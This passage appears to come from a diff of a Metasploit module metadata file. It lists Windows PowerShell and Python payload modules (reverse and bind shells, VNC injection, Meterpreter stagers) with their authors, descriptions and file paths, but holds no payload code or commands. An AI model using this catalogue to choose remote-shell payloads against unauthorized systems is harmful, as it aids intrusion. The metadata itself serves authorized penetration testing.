McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/shell_bind_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/shell_reverse_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 
+0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - 
"payload_cmd/windows/powershell/x64/vncinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_tcp": { - "name": "Powershell Exec, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - 
"stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_http": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_https": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - 
"adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the 
attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttp": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttps": { - "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - 
"sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/powershell_bind_tcp": { - "name": "Windows Interactive Powershell Session, Bind TCP", - "fullname": "payload/cmd/windows/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy" - ], - "description": "Interacts with a powershell session on an established socket connection", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/powershell_reverse_tcp": { - "name": "Windows Interactive Powershell Session, Reverse TCP", - "fullname": "payload/cmd/windows/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy" - ], - "description": "Interacts with a powershell session on an established socket connection", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/powershell_reverse_tcp_ssl": { - "name": "Windows Interactive Powershell Session, Reverse TCP SSL", - "fullname": "payload/cmd/windows/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy" - ], - "description": "Interacts with a powershell session on an established SSL socket connection", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/python/exec": { - "name": "Python Exec, Python Execute Command", - "fullname": "payload/cmd/windows/python/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/exec", - "staged": false - }, - "payload_cmd/windows/python/meterpreter/bind_tcp": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", - "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp" - }, - "payload_cmd/windows/python/meterpreter/bind_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp_uuid" - }, - "payload_cmd/windows/python/meterpreter/reverse_http": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 
2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_http", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_http" - }, - "payload_cmd/windows/python/meterpreter/reverse_https": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_https", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_https" - }, - 
"payload_cmd/windows/python/meterpreter/reverse_tcp": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp" - }, - "payload_cmd/windows/python/meterpreter/reverse_tcp_ssl": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell ", - "RageLtMan" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", 
- "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_tcp_ssl", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_ssl" - }, - "payload_cmd/windows/python/meterpreter/reverse_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - 